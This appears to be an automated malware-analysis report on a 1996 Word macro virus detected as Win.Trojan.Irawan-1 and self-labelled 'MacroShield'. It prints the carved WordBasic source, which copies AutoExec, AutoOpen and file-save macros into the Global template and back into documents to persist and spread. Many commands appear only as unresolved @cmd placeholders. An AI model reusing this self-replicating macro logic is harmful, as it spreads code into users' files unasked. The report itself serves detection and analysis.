Verdict: MALICIOUS
Risk Score: 102
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic
The sample exhibits legacy WordBasic macro virus markers and is explicitly detected by ClamAV as Win.Trojan.Irawan-1. The document body contains numerous references to 'RSN MACRO VIRUS' and 'MacroShield', indicating its purpose is related to macro virus functionality, likely for spreading or removal of other macros, but in this context, it is the malicious payload itself.
Heuristics (3)
- ClamAV: Win.Trojan.Irawan-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Irawan-1.
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): the OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro, or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
- Recovered legacy WordBasic macro source (info, OLE_LEGACY_WORDBASIC_MACRO_SOURCE): the Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so that its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| wordbasic_macros.txt | wordbasic-macro | analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source) | 5190 bytes |
SHA-256: e4cb9a42306c261e81015f8d5410bb513e3b7aafe41b8cbc90a95bc4e5c9594c
Preview script: first 1,000 lines of the extracted script
, = = = = 11876 11876 21349 21349 11876 21349 21349 11876 20325 8292
356 8292 @cmd6e75 REM menghapus makro yang diidentifik sebagai virus. (c) 1996 B. Irawa
MAIN
REM *********************************************************
REM * MacroShield, macro virus remover *
REM * Copyright (c) 1996 B. Irawan D *
REM * 3rd Beta Release in Dec, 9 1996 *
REM * Thanks to 1. 'Ci, you're my everything... *
REM * 2. Denny & Dhonny, thank's for your support *
REM * 3. All of my friend in OS III/96 *
REM * 4. All of my frien in STTTelkom '91 *
REM *********************************************************
"MacroShield, macro virus remover"
MAIN
, - * Dayeuhkolot
sMe$ = @cmd8025
sMacro$ = SMe$ = ":Autoexec"
@cmd80c2 sMacro$ , "Global:Autoexec"
sMacro$ = sMe$ = ":AutoOpen"
@cmd80c2 sMacro$ , "Global:AutoOpen"
sMacro$ = SMe$ = ":FileSave"
@cmd80c2 sMacro$ , "Global:FileSave"
sMacro$ = SMe$ = ":FileSaveAs"
@cmd80c2 sMacro$ , "Global:FileSaveAs"
sMacro$ = SMe$ = ":FileOpen"
@cmd80c2 sMacro$ , "Global:FileOpen"
sMacro$ = SMe$ = ":MacroShield"
@cmd80c2 sMacro$ , "Global:MacroShield" 29807
MAIN
MacroShield
MAIN
, - * STTTelkom
@cmd0053
dlg @cmd0054
dlg
dlg = 0 dlg = 1
@cmd0054 dlg
sMe$ = @cmd8025
sTMacro$ = sMe$ = ":AutoExec"
@cmd80c2 "Global:AutoExec" , sTMacro$
sTMacro$ = sMe$ = ":AutoOpen"
@cmd80c2 "Global:AutoOpen" , sTMacro$
sTMacro$ = sMe$ = ":FileSave"
@cmd80c2 "Global:FileSave" , sTMacro$
sTMacro$ = sMe$ = ":FileSaveAs"
@cmd80c2 "Global:FileSaveAs" , sTMacro$
sTMacro$ = SMe$ = ":FileOpen"
@cmd80c2 "Global:FileOpen" , STMacro$
sTMacro$ = SMe$ = ":MacroShield"
@cmd80c2 "Global:MacroShield" , STMacro$
* OSIII96 28523
Err 102
@cmd0054 dlg
=
MAIN
, - * STTTelkom
dlg @cmd0054
dlg
dlg
dlg = 0 dlg = 1
@cmd0054 dlg
sMe$ = @cmd8025
sTMacro$ = sMe$ = ":AutoExec"
@cmd80c2 "Global:AutoExec" , sTMacro$
sTMacro$ = sMe$ = ":AutoOpen"
@cmd80c2 "Global:AutoOpen" , sTMacro$
sTMacro$ = sMe$ = ":FileSave"
@cmd80c2 "Global:FileSave" , sTMacro$
sTMacro$ = sMe$ = ":FileSaveAs"
@cmd80c2 "Global:FileSaveAs" , sTMacro$
sTMacro$ = SMe$ = ":FileOpen"
@cmd80c2 "Global:FileOpen" , sTMacro$
sTMacro$ = SMe$ = ":MacroShield"
@cmd80c2 "Global:MacroShield" , STMacro$
* OSIII96 28523
Err 102
@cmd0054 dlg
=
REM *********************************************************
REM * MacroShield, macro virus remover *
REM * Copyright (c) 1996 B. Irawan D *
REM * 3rd Beta Release in Dec, 9 1996 *
REM * Thanks to 1. 'Ci, you're my everything... *
REM * 2. Denny & Dhonny, thank's for your support *
REM * 3. All of my friend in OS III/96 *
REM * 4. All of my friend in STTTelkom '91 *
REM *********************************************************
MAIN
multiFileMsg$ = "Anda tidak dapat membuka beberapa file bersamaan jika MacroShield terinstal. Yang pertama anda pilih akan dibuka."
spTitle$ = "MacroShield"
@cmd800f @cmd80b5 1 , "Macintosh" 0
wordVerCode = 0
@cmd800f @cmd80b5 1 , "Windows 3." 0
wordVerCode = 1
@cmd8008 @cmd80b5 2 , 1 = "6"
wordVerCode = 2
wordVerCode = 3
@cmd8111 0
@cmd809e
, - * ErrHandler
@cmd80d6 1
, - * 0
* StartOpen
29285
@cmd0209
@cmd80d6 1
Err = 0
dlg @cmd0050
dlg
file$ =
resp = dlg
resp = 0 wordVerCode 3 * EndFunc
fileList$ = Dlg
wordVerCode
1 REM WinWord 6
@cmd800f fileList$ , " " 0
separator = @cmd800f fileList$ , " "
fnameLen = separator 1
file$ = @cmd800a fileList$ , 1 , fnameLen
Dlg = file$
@cmd802b multiFileMsg$ , spTitle$ , 64
2 REM Winword NT
quotePos = @cmd800f 2 , fileList$ , @cmd8005 34
spacePos = @cmd800f fileList$ , " "
listLen = @cmd8003 fileList$
quotePos = 0 spacePos 0
fnameLen = spacePos 1
file$ = @cmd800a fileList$ , 1 , fnameLen
Dlg = file$
@cmd802b multiFileMsg$ , spTitle$ , 64
quotePos 0 quotePos listLen
fnameLen = quotePos
file$ = @cmd800a fileList$ , 1 , fnameLen
Dlg = file$
@cmd802b multiFileMsg$ , spTitle$ , 64
3 REM Winword 7
Resp = 0
@cmd8003 fileList$ 0
file$ = firstFile$ fileList$
Dlg = file$
@cmd802b multiFileMsg$ , spTitle$ , 64
* EndFunc
dlg = file$
dlg = 1
6501
, - * ErrHandler2
@cmd0050 dlg
, - * 0
* ScreenSwitch
29285
Err = 0
* EndFunc
=
file$ = @cmd8025
DlgFSA @cmd0054
DlgFSA
DlgFSA = 1 @cmd80b7 1 0 screenOpen file$
@cmd809e 0
, - * ErrHandler3
@cmd80d6 0
* EndFunc
29285
@cmd0209
@cmd80d6 0
Err = 0
=
screenOpen file$
autoopen$ = "autoopen"
HasAutoOpen = 0
MacroCount = @cmd80b7 1
i = 1 MacroCount
MacName$ = @cmd80b8 i , 1
@cmd80b0 MacName$ = autoopen$ HasAutoOpen = 1
i
OpenItClean file$ =
OpenItClean file$
@cmd80a0 2
, - * ErrHandler
@cmd004f = file$
, - * ErrHandler
@cmd0057 =
, - * 0
, - * ErrHandler2
@cmd8024
* EndFunc
29285
@cmd0209
@cmd0057 =
@cmd8024
Err = 0
29285
Err = 0 =
@cmd0054 = file$
firstFile$ FileList$
@cmd8008 FileList$ , 1 = @cmd8005 34
separator = @cmd800f 2 , FileList$ , @cmd8005 34
fnameLen = separator 2
firstFile$ = @cmd800a FileList$ , 2 , fnameLen
separator = @cmd800f FileList$ , " "
fnameLen = separator 1
firstFile$ = @cmd800a FileList$ , 1 , fnameLen